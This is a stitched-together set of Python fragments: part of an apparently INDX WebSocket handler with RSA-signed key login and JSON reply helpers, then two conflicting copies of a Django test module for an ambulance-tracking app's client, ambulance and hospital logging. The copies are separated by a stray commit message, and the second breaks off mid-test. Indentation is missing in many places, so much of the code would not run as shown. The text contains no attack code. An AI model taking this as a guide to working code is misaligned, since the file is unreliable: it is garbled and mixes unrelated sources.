def model_cb(resp):
model_id, boxid = resp
all_models = [model_id]
def sync_cb(indxsync):
indxsync.sync_boxes(all_models = all_models, websocket = self).addCallbacks(return_d.callback, return_d.errback)
self.webserver.sync_box(boxid).addCallbacks(sync_cb, return_d.errback)
self.get_model_by_key(public_key_hash, store).addCallbacks(model_cb, return_d.errback)
return return_d
def listen_remote(self, private_key, key_hash, observer, remote_encpk2):
self.remote_observer = observer
keyauth = {"key_hash": key_hash, "private_key": private_key, "encpk2": remote_encpk2}
try:
SSH_MSG_USERAUTH_REQUEST = "50"
method = "publickey"
algo = "SHA512"
key_hash, private_key, encpk2 = keyauth['key_hash'], keyauth['private_key'], keyauth['encpk2']
if not (type(encpk2) == type("") or type(encpk2) == type(u"")):
encpk2 = json.dumps(encpk2)
requestid = "{0}".format(uuid.uuid1())
ordered_signature_text = '{0}\t{1}\t"{2}"\t{3}\t{4}'.format(SSH_MSG_USERAUTH_REQUEST, requestid, method, algo, key_hash)
signature = rsa_sign(private_key, ordered_signature_text)
values = {"action": "login_keys", "signature": signature, "key_hash": key_hash, "algo": algo, "method": method, "appid": "INDX ASync", "encpk2": encpk2}
self.sendJSON(None, values, None)
except Exception as e:
logging.error("ASync: {0}".format(e))
def get_model_by_key(self, public_key_hash, store):
""" Get the ID of a 'link' object, based on the hash of a public key it uses.
Public keys are not reused, so it will only match one.
"""
return_d = Deferred()
query = {"type": indx.sync.NS_ROOT_BOX + "link",
"boxes":
{"key":
{"public-hash": public_key_hash}
}
}
def query_cb(graph):
modelid, boxname = None, None
for obj_id, obj in graph.root_objects().items():
modelid = obj_id
for box in graph.get(obj_id).get("boxes"):
for key in graph.get(box.id).get("key"):
public_hash = graph.get(key.id).getOneValue("public-hash")
if public_hash != public_key_hash: # pick the box that doesn't match the key, i.e. our box
boxname = graph.get(box.id).getOneValue("box")
return_d.callback((modelid, boxname))
return
return_d.errback(Exception("Could not find a model that uses the public key hash: {0}".format(public_key_hash)))
store.query(query, render_json = False, depth = 4).addCallbacks(query_cb, return_d.errback)
return return_d
def connected(self):
""" Called by WebSocketsHandler when the connection is completed through the real transport. """
# TokenKeeper from the webserver. The "webserver" attribtue in site is added in server.py when we create the WebSocketsSite.
self.tokenkeeper = self.webserver.tokens
self.tokens = {} # tokenid -> token object
self.send200(None, "connect", data = {})
def listen_diff(self, requestid, tokenid):
return_d = Deferred()
def store_cb(store):
logging.debug("WebSocketsHandler listen_diff, store_cb: {0}".format(store))
def observer_local(diff):
""" Receive an update from the server. """
logging.debug("WebSocketsHandler listen_diff observer notified: {0}".format(diff))
self.sendJSON(requestid, {"action": "diff", "operation": "update", "data": diff}, "diff")
store.listen(observer_local) # no callbacks, nothing to do
return_d.callback(True) # much success
token = self.tokens.get(tokenid)
if token is None:
return_d.errback(Failure(Exception("token invalid (it must be authed successfully to this websocket to use it here)")))
return return_d
token.get_store().addCallbacks(store_cb, return_d.errback)
return return_d
def sendJSON(self, requestid, data, respond_to = None):
""" Send data as JSON to the WebSocket. """
logging.debug("ASync send JSON of data: {0}, requestid: {1}".format(data, requestid))
#encoded = cjson.encode(data)
try:
if requestid:
data.update({"requestid": requestid})
if respond_to:
data.update({"respond_to": respond_to})
encoded = json.dumps(data)
self.send_f(encoded)
except Exception as e:
logging.error("Async error sending JSON: {0}".format(e))
def send500(self, requestid, respond_to, data = None):
    """ Reply with a 500 Internal Server Error JSON payload, merging in
        any extra fields supplied in `data`. """
    payload = {"success": False, "error": "500 Internal Server Error"}
    if data is not None:
        payload.update(data)
    self.sendJSON(requestid, payload, respond_to)
def send400(self, requestid, respond_to, data = None):
    """ Reply with a 400 Bad Request JSON payload, merging in any extra
        fields supplied in `data`. """
    payload = {"success": False, "error": "400 Bad Request"}
    if data is not None:
        payload.update(data)
    self.sendJSON(requestid, payload, respond_to)
def send401(self, requestid, respond_to, data = None):
    """ Reply with a 401 Unauthorized JSON payload, merging in any extra
        fields supplied in `data`. """
    payload = {"success": False, "error": "401 Unauthorized"}
    if data is not None:
        payload.update(data)
    self.sendJSON(requestid, payload, respond_to)
def send200(self, requestid, respond_to, data = None):
    """ Reply with a success JSON payload, merging in any extra fields
        supplied in `data`. """
    payload = {"success": True}
    if data is not None:
        payload.update(data)
    self.sendJSON(requestid, payload, respond_to)
|
import json
import logging
from io import BytesIO
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.db import transaction
from django.utils import timezone
from rest_framework.parsers import JSONParser
from django.test import Client as DjangoClient
from ambulance.models import Ambulance
from emstrack.tests.util import date2iso
from hospital.models import Hospital
from login.models import Client, ClientStatus, ClientLog, ClientActivity
from login.serializers import ClientSerializer
from login.tests.setup_data import TestSetup
logger = logging.getLogger(__name__)
class TestClient(TestSetup):
def testAmbulance(self):
    """Exercise the client/ambulance association state machine.

    Walks a client through online/offline transitions and ambulance
    login/logout, checking after every save that:
    * the reloaded client has the expected status and ambulance,
    * the ambulance's reverse `client` relation is set (or cleared),
    * the newest ClientLog entries record the expected
      (status, activity, details), and
    * the total number of log entries grows as expected.
    """

    def fetch(client):
        # Re-read from the database so we assert against persisted state.
        return Client.objects.get(id=client.id)

    def assert_logs(client, expected, total):
        # `expected` lists (status, activity, details) tuples for the
        # newest log entries, most recent first.
        logs = ClientLog.objects.filter(client=client).order_by('-updated_on')
        for log, (status, activity, details) in zip(logs, expected):
            self.assertEqual(log.client, client)
            self.assertEqual(log.status, status)
            self.assertEqual(log.activity, activity)
            self.assertEqual(log.details, details)
        # count() avoids fetching every row just to measure the queryset.
        self.assertEqual(ClientLog.objects.filter(client=client).count(), total)

    # client online
    client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
                                    status=ClientStatus.O.name)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, None)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1, [(ClientStatus.O.name, ClientActivity.HS.name, '')], 1)

    # go offline
    client1.status = ClientStatus.F.name
    client1.save()
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.F.name)
    self.assertEqual(client1.ambulance, None)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1, [(ClientStatus.F.name, ClientActivity.HS.name, '')], 2)

    # go online with ambulance
    client1.status = ClientStatus.O.name
    client1.ambulance = self.a1
    client1.save()
    a = Ambulance.objects.get(id=self.a1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, self.a1)
    self.assertEqual(a.client, client1)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.AI.name, self.a1.identifier),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 4)

    # go offline
    client1.status = ClientStatus.F.name
    client1.save()
    a = Ambulance.objects.get(id=self.a1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.F.name)
    self.assertEqual(client1.ambulance, None)
    self.assertFalse(hasattr(a, 'client'))
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.F.name, ClientActivity.HS.name, ''),
                 (ClientStatus.F.name, ClientActivity.AO.name, self.a1.identifier)], 6)

    # client online
    client1.status = ClientStatus.O.name
    client1.save()
    a = Ambulance.objects.get(id=self.a1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, None)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1, [(ClientStatus.O.name, ClientActivity.HS.name, '')], 7)

    # login ambulance a1
    client1.ambulance = self.a1
    client1.save()
    a = Ambulance.objects.get(id=self.a1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, self.a1)
    self.assertEqual(a.client, client1)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.AI.name, self.a1.identifier),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 9)

    # logout ambulance
    client1.ambulance = None
    client1.save()
    a = Ambulance.objects.get(id=self.a1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, None)
    self.assertFalse(hasattr(a, 'client'))
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.AO.name, self.a1.identifier),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 11)

    # login ambulance a2
    client1.ambulance = self.a2
    client1.save()
    a = Ambulance.objects.get(id=self.a2.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, self.a2)
    self.assertEqual(a.client, client1)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.AI.name, self.a2.identifier),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 13)

    # go offline
    client1.status = ClientStatus.F.name
    client1.save()
    a = Ambulance.objects.get(id=self.a2.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.F.name)
    self.assertEqual(client1.ambulance, None)
    self.assertFalse(hasattr(a, 'client'))
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.F.name, ClientActivity.HS.name, ''),
                 (ClientStatus.F.name, ClientActivity.AO.name, self.a2.identifier)], 15)
def testHospital(self):
    """Exercise the client/hospital association state machine.

    Mirrors testAmbulance for the hospital relation: online/offline
    transitions and hospital login/logout, asserting persisted client
    state, the hospital's reverse `client` relation, and the ClientLog
    trail after every save.

    Bug fix: the "client online" step previously did
    `Ambulance.objects.get(id=self.h1.id)` — it queried the wrong model
    with a hospital primary key; it now queries Hospital.
    """

    def fetch(client):
        # Re-read from the database so we assert against persisted state.
        return Client.objects.get(id=client.id)

    def assert_logs(client, expected, total):
        # `expected` lists (status, activity, details) tuples for the
        # newest log entries, most recent first.
        logs = ClientLog.objects.filter(client=client).order_by('-updated_on')
        for log, (status, activity, details) in zip(logs, expected):
            self.assertEqual(log.client, client)
            self.assertEqual(log.status, status)
            self.assertEqual(log.activity, activity)
            self.assertEqual(log.details, details)
        # count() avoids fetching every row just to measure the queryset.
        self.assertEqual(ClientLog.objects.filter(client=client).count(), total)

    # client online
    client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
                                    status=ClientStatus.O.name)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, None)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1, [(ClientStatus.O.name, ClientActivity.HS.name, '')], 1)

    # go offline
    client1.status = ClientStatus.F.name
    client1.save()
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.F.name)
    self.assertEqual(client1.ambulance, None)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1, [(ClientStatus.F.name, ClientActivity.HS.name, '')], 2)

    # go online with hospital
    client1.status = ClientStatus.O.name
    client1.hospital = self.h1
    client1.save()
    h = Hospital.objects.get(id=self.h1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.hospital, self.h1)
    self.assertEqual(h.client, client1)
    self.assertEqual(client1.ambulance, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.HI.name, self.h1.name),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 4)

    # go offline
    client1.status = ClientStatus.F.name
    client1.save()
    h = Hospital.objects.get(id=self.h1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.F.name)
    self.assertEqual(client1.ambulance, None)
    self.assertFalse(hasattr(h, 'client'))
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.F.name, ClientActivity.HS.name, ''),
                 (ClientStatus.F.name, ClientActivity.HO.name, self.h1.name)], 6)

    # client online
    client1.status = ClientStatus.O.name
    client1.save()
    # Was Ambulance.objects.get(id=self.h1.id): wrong model for a
    # hospital primary key.
    h = Hospital.objects.get(id=self.h1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, None)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1, [(ClientStatus.O.name, ClientActivity.HS.name, '')], 7)

    # login hospital h1
    client1.hospital = self.h1
    client1.save()
    h = Hospital.objects.get(id=self.h1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.hospital, self.h1)
    self.assertEqual(h.client, client1)
    self.assertEqual(client1.ambulance, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.HI.name, self.h1.name),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 9)

    # logout hospital
    client1.hospital = None
    client1.save()
    h = Hospital.objects.get(id=self.h1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, None)
    self.assertFalse(hasattr(h, 'client'))
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.HO.name, self.h1.name),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 11)

    # login hospital h2
    client1.hospital = self.h2
    client1.save()
    h = Hospital.objects.get(id=self.h2.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.hospital, self.h2)
    self.assertEqual(h.client, client1)
    self.assertEqual(client1.ambulance, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.HI.name, self.h2.name),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 13)

    # go offline
    client1.status = ClientStatus.F.name
    client1.save()
    h = Hospital.objects.get(id=self.h2.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.F.name)
    self.assertEqual(client1.ambulance, None)
    self.assertFalse(hasattr(h, 'client'))
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.F.name, ClientActivity.HS.name, ''),
                 (ClientStatus.F.name, ClientActivity.HO.name, self.h2.name)], 15)
def testPermissions(self):
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u2,
status=ClientStatus.O.name, ambulance=self.a1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u2,
status=ClientStatus.O.name, ambulance=self.a1, hospital=self.h1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u3,
status=ClientStatus.O.name, hospital=self.h1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u3,
status=ClientStatus.O.name, ambulance=self.a1, hospital=self.h1)
def testClientSerializer(self):
    """Validate ClientSerializer: serialization of an existing client,
    creation with and without an ambulance, and a partial update.

    Replaces the `if not serializer.is_valid(): log; assertTrue(False)`
    anti-pattern with `assertTrue(serializer.is_valid(), serializer.errors)`,
    which fails with the validation errors in the assertion message.
    """
    # serialize an online client attached to ambulance a1
    client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
                                    status=ClientStatus.O.name, ambulance=self.a1)
    serializer = ClientSerializer(client1)
    result = {
        'id': client1.id,
        'client_id': client1.client_id,
        'user': client1.user.id,
        'status': client1.status,
        'ambulance': client1.ambulance.id,
        'hospital': None,
        'updated_on': date2iso(client1.updated_on)
    }
    self.assertDictEqual(serializer.data, result)

    # create a client with neither ambulance nor hospital
    serializer = ClientSerializer(data={
        'client_id': 'client_id_3',
        'status': ClientStatus.O.name,
        'ambulance': None,
        'hospital': None
    })
    self.assertTrue(serializer.is_valid(), serializer.errors)
    serializer.save(user=self.u2)
    client2 = Client.objects.get(client_id='client_id_3')
    self.assertEqual(client2.status, ClientStatus.O.name)
    self.assertEqual(client2.user, self.u2)
    self.assertEqual(client2.ambulance, None)
    self.assertEqual(client2.hospital, None)

    # create a client attached to ambulance a2
    serializer = ClientSerializer(data={
        'client_id': 'client_id_4',
        'status': ClientStatus.O.name,
        'ambulance': self.a2.id,
        'hospital': None
    })
    self.assertTrue(serializer.is_valid(), serializer.errors)
    serializer.save(user=self.u1)
    client2 = Client.objects.get(client_id='client_id_4')
    self.assertEqual(client2.status, ClientStatus.O.name)
    self.assertEqual(client2.user, self.u1)
    self.assertEqual(client2.ambulance, self.a2)
    self.assertEqual(client2.hospital, None)

    # partial update: attach hospital h1 as well
    serializer = ClientSerializer(data={
        'client_id': 'client_id_4',
        'hospital': self.h1.id
    }, partial=True)
    self.assertTrue(serializer.is_valid(), serializer.errors)
    serializer.save(user=self.u1)
    client2 = Client.objects.get(client_id='client_id_4')
    self.assertEqual(client2.status, ClientStatus.O.name)
    self.assertEqual(client2.user, self.u1)
    self.assertEqual(client2.ambulance, self.a2)
    self.assertEqual(client2.hospital, self.h1)
def test_client_viewset(self):
    """Retrieve and update a client through the REST API as the admin user.

    Checks GET of a fresh client against its serializer output, a PATCH
    that sets status and ambulance, and a follow-up GET confirming the
    change was persisted.

    A ~160-line block of commented-out tests copied from the ambulance
    API suite (location updates, permission checks for testuser1/2) was
    removed as dead code; recover it from version control if those cases
    are ever ported to the client API.
    """
    # client online
    client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
                                    status=ClientStatus.O.name)
    # instantiate an HTTP test client and log in as admin
    client = DjangoClient()
    client.login(username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'])

    # retrieve: GET must mirror the serializer's view of the client
    response = client.get('/en/api/client/{}/'.format(str(client1.client_id)),
                          follow=True)
    self.assertEqual(response.status_code, 200)
    result = JSONParser().parse(BytesIO(response.content))
    answer = ClientSerializer(client1).data
    self.assertDictEqual(result, answer)

    # set status and ambulance via PATCH
    status = ClientStatus.F.name
    response = client.patch('/en/api/client/{}/'.format(str(client1.client_id)),
                            content_type='application/json',
                            data=json.dumps({
                                'status': status,
                                'ambulance': self.a1.id
                            }),
                            follow=True)
    self.assertEqual(response.status_code, 200)
    result = JSONParser().parse(BytesIO(response.content))
    answer = ClientSerializer(Client.objects.get(id=client1.id)).data
    self.assertDictEqual(result, answer)

    # retrieve again: the new status and ambulance must be persisted
    response = client.get('/en/api/client/{}/'.format(str(client1.client_id)),
                          follow=True)
    self.assertEqual(response.status_code, 200)
    result = JSONParser().parse(BytesIO(response.content))
    self.assertEqual(result['status'], status)
    self.assertEqual(result['ambulance'], self.a1.id)
Removing location_client from ambulance.
import json
import logging
from io import BytesIO
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.db import transaction
from django.utils import timezone
from rest_framework.parsers import JSONParser
from django.test import Client as DjangoClient
from ambulance.models import Ambulance
from emstrack.tests.util import date2iso
from hospital.models import Hospital
from login.models import Client, ClientStatus, ClientLog, ClientActivity
from login.serializers import ClientSerializer
from login.tests.setup_data import TestSetup
logger = logging.getLogger(__name__)
class TestClient(TestSetup):
def testAmbulance(self):
    """Exercise the client/ambulance association state machine.

    Walks a client through online/offline transitions and ambulance
    login/logout, checking after every save that:
    * the reloaded client has the expected status and ambulance,
    * the ambulance's reverse `client` relation is set (or cleared),
    * the newest ClientLog entries record the expected
      (status, activity, details), and
    * the total number of log entries grows as expected.
    """

    def fetch(client):
        # Re-read from the database so we assert against persisted state.
        return Client.objects.get(id=client.id)

    def assert_logs(client, expected, total):
        # `expected` lists (status, activity, details) tuples for the
        # newest log entries, most recent first.
        logs = ClientLog.objects.filter(client=client).order_by('-updated_on')
        for log, (status, activity, details) in zip(logs, expected):
            self.assertEqual(log.client, client)
            self.assertEqual(log.status, status)
            self.assertEqual(log.activity, activity)
            self.assertEqual(log.details, details)
        # count() avoids fetching every row just to measure the queryset.
        self.assertEqual(ClientLog.objects.filter(client=client).count(), total)

    # client online
    client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
                                    status=ClientStatus.O.name)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, None)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1, [(ClientStatus.O.name, ClientActivity.HS.name, '')], 1)

    # go offline
    client1.status = ClientStatus.F.name
    client1.save()
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.F.name)
    self.assertEqual(client1.ambulance, None)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1, [(ClientStatus.F.name, ClientActivity.HS.name, '')], 2)

    # go online with ambulance
    client1.status = ClientStatus.O.name
    client1.ambulance = self.a1
    client1.save()
    a = Ambulance.objects.get(id=self.a1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, self.a1)
    self.assertEqual(a.client, client1)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.AI.name, self.a1.identifier),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 4)

    # go offline
    client1.status = ClientStatus.F.name
    client1.save()
    a = Ambulance.objects.get(id=self.a1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.F.name)
    self.assertEqual(client1.ambulance, None)
    self.assertFalse(hasattr(a, 'client'))
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.F.name, ClientActivity.HS.name, ''),
                 (ClientStatus.F.name, ClientActivity.AO.name, self.a1.identifier)], 6)

    # client online
    client1.status = ClientStatus.O.name
    client1.save()
    a = Ambulance.objects.get(id=self.a1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, None)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1, [(ClientStatus.O.name, ClientActivity.HS.name, '')], 7)

    # login ambulance a1
    client1.ambulance = self.a1
    client1.save()
    a = Ambulance.objects.get(id=self.a1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, self.a1)
    self.assertEqual(a.client, client1)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.AI.name, self.a1.identifier),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 9)

    # logout ambulance
    client1.ambulance = None
    client1.save()
    a = Ambulance.objects.get(id=self.a1.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, None)
    self.assertFalse(hasattr(a, 'client'))
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.AO.name, self.a1.identifier),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 11)

    # login ambulance a2
    client1.ambulance = self.a2
    client1.save()
    a = Ambulance.objects.get(id=self.a2.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.O.name)
    self.assertEqual(client1.ambulance, self.a2)
    self.assertEqual(a.client, client1)
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.O.name, ClientActivity.AI.name, self.a2.identifier),
                 (ClientStatus.O.name, ClientActivity.HS.name, '')], 13)

    # go offline
    client1.status = ClientStatus.F.name
    client1.save()
    a = Ambulance.objects.get(id=self.a2.id)
    client1 = fetch(client1)
    self.assertEqual(client1.status, ClientStatus.F.name)
    self.assertEqual(client1.ambulance, None)
    self.assertFalse(hasattr(a, 'client'))
    self.assertEqual(client1.hospital, None)
    assert_logs(client1,
                [(ClientStatus.F.name, ClientActivity.HS.name, ''),
                 (ClientStatus.F.name, ClientActivity.AO.name, self.a2.identifier)], 15)
def testHospital(self):
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 1)
# go offline
client1.status = ClientStatus.F.name
client1.save()
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 2)
# go online with hospital
client1.status = ClientStatus.O.name
client1.hospital = self.h1
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.hospital, self.h1)
self.assertEqual(h.client, client1)
self.assertEqual(client1.ambulance, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HI.name)
self.assertEqual(log.details, self.h1.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 4)
# go offline
client1.status = ClientStatus.F.name
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(h, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HO.name)
self.assertEqual(log.details, self.h1.name)
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 6)
# client online
client1.status = ClientStatus.O.name
client1.save()
h = Ambulance.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 7)
# login hospital a1
client1.hospital = self.h1
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.hospital, self.h1)
self.assertEqual(h.client, client1)
self.assertEqual(client1.ambulance, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HI.name)
self.assertEqual(log.details, self.h1.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 9)
# logout ambulance
client1.hospital = None
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(h, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HO.name)
self.assertEqual(log.details, self.h1.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 11)
# login ambulance a2
client1.hospital = self.h2
client1.save()
h = Hospital.objects.get(id=self.h2.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.hospital, self.h2)
self.assertEqual(h.client, client1)
self.assertEqual(client1.ambulance, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HI.name)
self.assertEqual(log.details, self.h2.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 13)
# go offline
client1.status = ClientStatus.F.name
client1.save()
h = Hospital.objects.get(id=self.h2.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(h, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
